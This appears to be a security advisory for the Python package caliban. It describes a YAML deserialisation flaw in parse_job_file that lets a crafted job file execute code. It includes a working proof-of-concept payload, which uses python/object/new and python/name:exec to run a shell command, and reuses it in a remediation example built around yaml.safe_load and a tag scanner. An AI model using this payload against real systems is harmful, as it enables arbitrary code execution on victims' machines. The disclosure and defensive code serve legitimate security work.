caliban

vulnerability arbitrary code execution
severity 3.8
language python
registry pypi

Description

Caliban is a tool that helps researchers launch and track their numerical experiments in an isolated, reproducible computing environment. It was developed by machine learning researchers and engineers, and makes it easy to go from a simple prototype running on a workstation to thousands of experimental jobs running on Cloud.

  • Vulnerability description: vulnerable to a YAML deserialisation attack caused by unsafe loading. caliban.platform.gke.util.parse_job_file reads the user-supplied job file with yaml.load(f, Loader=yaml.FullLoader). FullLoader still resolves python/* tags such as !!python/object/new and !!python/name, so a crafted job file executes arbitrary code in the process that parses it.

Proof of Concept

Vulnerable line in caliban.platform.gke.util.parse_job_file:

job_spec = yaml.load(f, Loader=yaml.FullLoader)

# exploit.py
import os
os.system('pip install caliban')
import caliban.platform.gke.util as ut

# FullLoader resolves the python/object/new and python/name tags, so this
# document builds a class whose "extend" attribute is the builtin exec() and
# then calls it on the listitems string.
exploit = '''!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
'''
with open('exploit.yaml', 'w') as fh:
    fh.write(exploit)
# parse_job_file() passes the file to yaml.load(..., Loader=yaml.FullLoader);
# xcalc is launched while the job file is being parsed.
ut.parse_job_file('exploit.yaml')
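The fix is to parse job files with yaml.safe_load, whose SafeLoader only knows the core YAML types and raises on any python/* tag. The block below is an added example, not caliban's own code: it reuses the payload shape from the proof of concept above, shows a hardened replacement for the vulnerable yaml.load call, and adds a small pre-load check that lists python/* tags via yaml.compose (which builds the node graph without constructing any object). The benign job file and its keys (name, command, args) are constructed for illustration; caliban's real job-file schema is not shown on this page.

```python
import yaml

# Constructed payload with the same shape as the PoC on this page: FullLoader
# resolves python/object/new and python/name, so loading it calls exec().
PAYLOAD = '''!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
'''

# Constructed benign job file. The keys are an assumption for illustration;
# caliban's actual job-file schema is not part of this page.
BENIGN_SPEC = '''
name: sample-job
command: ["python", "train.py"]
args:
  learning_rate: 0.01
  epochs: 10
'''

# "!!" expands to this namespace, so every PyYAML-specific tag starts with it.
PYTHON_TAG_PREFIX = "tag:yaml.org,2002:python/"


def python_tags(text):
    """Return every python/* tag in the document, sorted, without constructing
    anything: yaml.compose only builds the representation graph, so tagged nodes
    are never instantiated and the check itself cannot trigger code execution."""
    root = yaml.compose(text, Loader=yaml.SafeLoader)
    found = []
    stack = [root]
    while stack:
        node = stack.pop()
        if node is None:            # empty document
            continue
        if node.tag.startswith(PYTHON_TAG_PREFIX):
            found.append(node.tag)
        if isinstance(node, yaml.SequenceNode):
            stack.extend(node.value)
        elif isinstance(node, yaml.MappingNode):
            for key, value in node.value:
                stack.append(key)
                stack.append(value)
    return sorted(found)


def parse_job_file_safe(text):
    """Hardened replacement for yaml.load(f, Loader=yaml.FullLoader).
    SafeLoader has no constructor for python/* tags, so a job file that carries
    one fails with ConstructorError instead of instantiating arbitrary objects."""
    return yaml.safe_load(text)


def load_outcome(text):
    """Return ("ok", data) for a clean job file or ("rejected", message) when
    the hardened loader refuses the document."""
    try:
        return ("ok", parse_job_file_safe(text))
    except yaml.constructor.ConstructorError as err:
        return ("rejected", str(err))


if __name__ == "__main__":
    print("payload tags:", python_tags(PAYLOAD))
    print("benign tags: ", python_tags(BENIGN_SPEC))
    print("benign load: ", load_outcome(BENIGN_SPEC))
    print("payload load:", load_outcome(PAYLOAD)[0])
```

The tag scan is a defence-in-depth signal for logging or rejecting suspicious job files before they reach any loader; the actual fix is the switch to yaml.safe_load, which stays safe even if a python/* tag is smuggled past a naive string check.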

References